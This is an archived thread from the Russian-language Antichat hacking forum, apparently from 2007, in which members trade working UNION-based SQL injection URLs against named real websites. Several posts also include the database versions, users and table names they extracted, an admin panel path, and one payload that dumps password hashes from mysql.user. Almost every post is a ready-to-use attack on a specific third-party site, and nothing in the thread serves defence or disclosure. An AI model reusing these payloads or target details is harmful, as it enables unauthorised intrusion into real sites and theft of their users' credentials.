ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3621  
Старый 10.11.2007, 03:01
Dark[<X>]D1ablo
Новичок
Регистрация: 21.10.2007
Сообщений: 5
Провел на форуме:
23460

Репутация: 9
По умолчанию

http://www.colorprint.ru/index.php?id=-37+union+select+concat_ws(0x2F,version(),database( )%20,user()),2,3,4,5,6,7/*
 
Ответить с цитированием

  #3622  
Старый 10.11.2007, 03:04
FoxMALDER
Познающий
Регистрация: 26.07.2007
Сообщений: 50
Провел на форуме:
177050

Репутация: 62
По умолчанию

anti-crime.org - Антикримінальний вибір
4.1.20:akv@localhost:usrdb_extaxobh_testakv
Код:
http://www.anti-crime.org/search.php?avtor=-1'+union+select+1,2,3,4,concat(version(),char(58),user(),char(58),database()),6,7/*
Есть таблицы:
grani_main (ni, podvodka, st_type, tmstamp, zag, avtor, is_public)
akv_forum
party
P.S.: К сожалению нет доступа к базам mysql и information_schema
 
Ответить с цитированием

  #3623  
Старый 10.11.2007, 03:20
Dark[<X>]D1ablo
Новичок
Регистрация: 21.10.2007
Сообщений: 5
Провел на форуме:
23460

Репутация: 9
По умолчанию

http://www.lyapis.com/articles.php?id=-138+union+select+1,2,DATABASE(),USER(),VERSION(),6 ,7,8,9/*

То что таблицы не нашёл не судить, завтра попытаюсь отыскать.
 
Ответить с цитированием

  #3624  
Старый 10.11.2007, 03:33
FoxMALDER
Познающий
Регистрация: 26.07.2007
Сообщений: 50
Провел на форуме:
177050

Репутация: 62
По умолчанию

Цитата:
Сообщение от Dark[<X>]D1ablo  
То что таблицы не нашёл не судить, завтра попытаюсь отыскать.
news
albums
articles

Код:
http://www.lyapis.com/photo.php?cl=-1+union+select+1,2,3,4,5,6/*
http://www.lyapis.com/albums.php?id=-1+union+select+1,2,3,4,5,6/*
http://www.lyapis.com/anons.php?id=-1+union+select+1,2,3,4,5/*
Админка с Basic'ом
Код:
http://www.lyapis.com/admin/


P.S.: Теперь остался форум. И не исключено, что база называется lyapis_forum...

Последний раз редактировалось FoxMALDER; 10.11.2007 в 08:27..
 
Ответить с цитированием

  #3625  
Старый 10.11.2007, 03:36
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761

Репутация: 237
Отправить сообщение для K1nD[e]R с помощью ICQ
По умолчанию

Код:
http://www.rabota-omsk.info/comment.php?ID=-1+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5+from+users/*
5.0.22/jobsmarket_omsk/jobsmarket_job@localhost
 
Ответить с цитированием

  #3626  
Старый 10.11.2007, 03:41
-MoLoToK-
Познающий
Регистрация: 04.10.2007
Сообщений: 32
Провел на форуме:
188171

Репутация: 88
Отправить сообщение для -MoLoToK- с помощью ICQ
По умолчанию

Код:
http://www.vip-electronic.ru/index.php?productID=688+union+select+1,2,3,4/*
vipelect_vp@localhost
 
Ответить с цитированием

  #3627  
Старый 10.11.2007, 04:14
KEHT33
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459

Репутация: 79
По умолчанию

Код HTML:
http://www.pronline.ru/gospriemka.php?letter=-8+UNION+SELECT+1,2,3,4,5,6,7+From+phpads_clients/*
БД 4

Код HTML:
http://www.newmind.ru/index.php?cat_id=-40+union+select+1,2,3,4,5,6,7,8,9,10,11/*
БД 5

Код HTML:
http://www.gallery-a.ru/expo/index.php?expo=HERZEN&room=expo&leaf=000035%20union%20select%201,name+FROM+users/*
БД 4
 
Ответить с цитированием

  #3628  
Старый 10.11.2007, 05:15
FoxMALDER
Познающий
Регистрация: 26.07.2007
Сообщений: 50
Провел на форуме:
177050

Репутация: 62
По умолчанию

aker.com.ua - Научно-производственная компания "АКЕР"
4.1.21-standard-logaker_akeraker_aker@localhost
Код:
http://aker.com.ua/index.php?pageid=-1+union+select+1,2,3,concat_ws(0x05,version(),database(),user()),5,6,7,8,9,10,11,12
http://aker.com.ua/a-news/news.php?id=-1+union+select+1,2,3,concat_ws(0x05,version(),database(),user()),5,6,7,8
Таблицы:
aimglib_files (id, nshows, groupid, date)
aadm_menu
anews_news
picture_amount
 
Ответить с цитированием

  #3629  
Старый 10.11.2007, 08:24
FoxMALDER
Познающий
Регистрация: 26.07.2007
Сообщений: 50
Провел на форуме:
177050

Репутация: 62
По умолчанию

arsenal.kharkov.ua - ФК "Арсенал"
4.0.21-logarsenalarsenal@localhost
Код:
http://www.arsenal.kharkov.ua/archive.phtml?id_rubric=1&id_rubric2=-1+union+select+1,2,3,4,5,concat_ws(0x05,version(),database(),user()),7,8,9,10,11,12/*
users (id, password, email, country, city)
vote
P.S.: Столбик пользователя не нашел...
 
Ответить с цитированием

  #3630  
Старый 10.11.2007, 12:37
Solide Snake
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499

Репутация: 3702


Отправить сообщение для Solide Snake с помощью ICQ
По умолчанию

www.ceethree.us

Цитата:
http://www.ceethree.us/comments.php?ID=-2633+union+select+convert(user+using+latin1),2,pas sword,4,5,6,7,8,9,10,11,12+from+mysql.user/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ